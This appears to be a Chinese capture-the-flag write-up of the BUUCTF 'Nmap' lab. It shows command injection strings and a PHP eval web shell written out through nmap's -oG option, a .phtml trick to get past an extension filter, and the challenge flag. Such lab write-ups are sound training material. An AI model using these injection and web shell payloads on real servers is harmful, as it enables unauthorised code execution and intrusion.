BUUCTF——Nmap

BUUCTF------Nmap

进入靶场

类似于一个nmap的网站

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

应该有过滤 加了个\

直接构造个php木马上传试试

复制代码
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

复制代码
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

拼接访问一下成功上传

用蚁剑连接看看

成功连接

接下来就慢慢找flag

在根目录下找到flag

复制代码
flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

相关推荐
码农12138号3 分钟前
网络安全-SQL注入
数据库·web安全·sql注入
虹科网络安全10 分钟前
艾体宝产品 | 防范开放共享风险:艾体宝Lepide助力企业实现文件共享安全与合规
安全
前进的李工11 分钟前
AI安全威胁:对抗样本到数据隐私全解析(13种安全威胁及防护)
网络·人工智能·安全·语言模型·网络攻击模型
猪肉炖白菜11 分钟前
TCP/IP协议簇包含的协议
网络·网络协议·tcp/ip
vortex514 分钟前
浅谈Linux文件读取类漏洞的额外攻击面
linux·安全·web安全
老猿讲编程16 分钟前
【AUTOSAR AP R25】 安全硬件加速(Safe Hardware Acceleration)需求一览
安全·硬件加速·autosar ap
晚霞的不甘17 分钟前
[鸿蒙2025领航者闯关]Flutter + OpenHarmony 安全开发实践:构建可信、合规、防逆向的鸿蒙应用
安全·flutter·harmonyos
CodingCos18 分钟前
【PCIe 总线及设备入门学习专栏 9.1 -- PCIe AER 中的 aer_layer 与 aer_agent】
网络·学习
水天需01019 分钟前
ps 命令全面详解
linux·服务器·网络
骆驼102420 分钟前
交换机ACL与防火墙的区别
网络安全·acl·状态检测